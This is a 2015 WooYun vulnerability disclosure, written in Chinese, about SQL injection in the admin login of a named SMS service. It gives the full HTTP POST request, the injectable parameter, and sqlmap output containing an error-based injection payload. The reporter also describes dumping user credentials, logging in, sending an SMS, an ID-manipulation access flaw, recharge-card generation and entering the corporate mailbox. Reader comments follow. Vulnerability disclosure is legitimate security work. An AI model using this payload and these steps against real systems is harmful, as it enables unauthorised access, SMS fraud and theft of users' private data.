多打电话某系统SQL注入漏洞（可免费发送任意短信用于诈骗等附送后台越权/涉及N多用户隐私/另可生成充值卡/进入企业邮箱）

发表于 2015年07月14日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0126702

漏洞标题：多打电话某系统SQL注入漏洞（可免费发送任意短信用于诈骗等附送后台越权/涉及N多用户隐私/另可生成充值卡/进入企业邮箱）

漏洞详情

披露状态：

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-19: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

天地本不仁万物为刍狗【HD】以团队之名以个人之荣耀共建网络安全

详细说明：

POST数据包：

POST /managerlogin.jsp HTTP/1.1<br>
Host: sms.iddsms.com<br>
Content-Length: 49<br>
Cache-Control: max-age=0<br>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br>
Origin: http://sms.iddsms.com<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36<br>
Content-Type: application/x-www-form-urlencoded<br>
Referer: http://sms.iddsms.com/managerlogin.jsp<br>
Accept-Encoding: gzip, deflate<br>
Accept-Language: zh-CN,zh;q=0.8<br>
Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460Adotype=check&loginuser=admin&loginpswd=admin&qq=+

POST /managerlogin.jsp HTTP/1.1

Host: sms.iddsms.com

Content-Length: 49

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://sms.iddsms.com

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://sms.iddsms.com/managerlogin.jsp

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460Adotype=check&loginuser=admin&loginpswd=admin&qq=+

参数 loginuser 可注入

看了下 websmss

虽然用户数量不是很多也没跑了跑了下 sys_user 的表（为进一步证明危害勿怪）

随便解密了一个登陆了下

然后······看见短信管理中心···就给自己的手机发了条测试短信·····

越权：http://sms.iddsms.com/manager/base/tailmt.jsp?seqid=1262236修改ID可越权

其他的就不说了下面我们进入 admin 这个账号里面更劲爆哦

这里的用户管理与用户隐私我就不说了下面还可以充值卡生成与管理（因为涉及到钱密码打了马赛克了）

邮箱的配置

密码就不用说了吧很简单拿到手进入企业邮箱

拿到企业邮箱后可进行进一步的渗透这里就不继续了

漏洞证明：

sqlmap identified the following injection points with a total of 0 HTTP(s) reque<br>
sts:<br>
---<br>
Parameter: loginuser (POST)<br>
    Type: error-based<br>
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl<br>
ause<br>
    Payload: dotype=check&loginuser=admin' AND (SELECT 8829 FROM(SELECT COUNT(*)<br>
,CONCAT(0x7171716b71,(SELECT (ELT(8829=8829,1))),0x7170627071,FLOOR(RAND(0)*2))x<br>
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EbDl'='EbDl&loginpswd<br>
=admin&qq=<br>
---<br>
[13:27:35] [INFO] the back-end DBMS is MySQL<br>
back-end DBMS: MySQL 5.0<br>
[13:27:35] [INFO] fetching database names<br>
[13:27:35] [INFO] the SQL query used returns 2 entries<br>
[13:27:35] [INFO] resumed: information_schema<br>
[13:27:35] [INFO] resumed: websmss<br>
available databases [2]:<br>
[*] information_schema<br>
[*] websmss[13:27:35] [INFO] fetched data logged to text files under 'C:\Users\Administrato<br>
r\.sqlmap\output\sms.iddsms.com'[*] shutting down at 13:27:35

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Parameter: loginuser (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl

ause

Payload: dotype=check&loginuser=admin' AND (SELECT 8829 FROM(SELECT COUNT(*)

,CONCAT(0x7171716b71,(SELECT (ELT(8829=8829,1))),0x7170627071,FLOOR(RAND(0)*2))x

FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EbDl'='EbDl&loginpswd

=admin&qq=

---

[13:27:35] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5.0

[13:27:35] [INFO] fetching database names

[13:27:35] [INFO] the SQL query used returns 2 entries

[13:27:35] [INFO] resumed: information_schema

[13:27:35] [INFO] resumed: websmss

available databases [2]:

[*] information_schema

[*] websmss[13:27:35] [INFO] fetched data logged to text files under 'C:\Users\Administrato

r\.sqlmap\output\sms.iddsms.com'[*] shutting down at 13:27:35

修复方案：

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-07-1914:42

厂商回复：

漏洞Rank：15 (WooYun评价)

评价

2010-01-01 00:00 大亮白帽子 | Rank:267 漏洞数:28)

标题太长了
2010-01-01 00:00 牛小帅白帽子 | Rank:407 漏洞数:34)

嘎嘎
2010-01-01 00:00 天地不仁以万物为刍狗白帽子 | Rank:467 漏洞数:54)

@大亮最近流行长标题所以我也试试
2010-01-01 00:00 0x 80 白帽子 | Rank:967 漏洞数:111)

你一天到晚都在POST
2010-01-01 00:00 天地不仁以万物为刍狗白帽子 | Rank:467 漏洞数:54)

@0x 80 还说我···你不也一样嘛···
2010-01-01 00:00 0x 80 白帽子 | Rank:967 漏洞数:111)

@天地不仁以万物为刍狗我哪里天天玩POST了，我很少发POST注入好不好